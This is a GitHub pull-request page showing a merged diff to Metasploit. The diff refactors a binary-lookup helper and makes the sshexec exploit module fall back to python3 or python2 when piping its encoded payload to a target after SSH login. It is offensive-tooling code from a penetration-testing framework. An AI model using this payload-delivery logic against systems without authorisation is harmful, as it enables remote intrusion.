Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fallback to Python3 in sshexec when it's available #15358

Merged
merged 1 commit into from
Jun 22, 2021
Merged

Fallback to Python3 in sshexec when it's available #15358

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
29 changes: 20 additions & 9 deletions lib/msf/base/sessions/command_shell.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -328,22 +328,33 @@ def cmd_shell(*args)
print_error("Can not pop up an interactive shell")
end

def self.binary_exists(binary, platform: nil, &block)
if block.call('command -v command').to_s.strip == 'command'
binary_path = block.call("command -v '#{binary}' && echo true").to_s.strip
else
binary_path = block.call("which '#{binary}' && echo true").to_s.strip
end
return nil unless binary_path.include?('true')

binary_path.split("\n")[0].strip # removes 'true' from stdout
end

#
# Returns path of a binary in PATH env.
#
def binary_exists(binary)
print_status("Trying to find binary(#{binary}) on target machine")
if shell_command_token('command -v command').to_s.strip == 'command'
binary_path = shell_command_token("command -v '#{binary}' && echo true").to_s.strip
else
binary_path = shell_command_token("which '#{binary}' && echo true").to_s.strip
print_status("Trying to find binary '#{binary}' on the target machine")

binary_path = self.class.binary_exists(binary, platform: platform) do |command|
shell_command_token(command)
end
unless binary_path.include?("true")

if binary_path.nil?
print_error("#{binary} not found")
return nil
else
print_status("Found #{binary} at #{binary_path}")
end
binary_path = binary_path.split("\n")[0].strip #removes 'true' from stdout
print_status("Found #{binary} at #{binary_path}")

return binary_path
end

Expand Down
15 changes: 14 additions & 1 deletion modules/exploits/multi/ssh/sshexec.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -199,13 +199,26 @@ def do_login(ip, user, pass, port)
fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end

def binary_exists(binary, platform: nil)
Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))
end

def execute_python
python_binary = binary_exists('python', platform: 'unix')
python_binary ||= binary_exists('python3', platform: 'unix')
python_binary ||= binary_exists('python2', platform: 'unix')
fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?

execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
end

def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")

case target['Platform']
when 'python'
execute_command("python -c \"#{payload.encoded}\"")
execute_python
when 'unix'
execute_command(payload.encoded)
else
Expand Down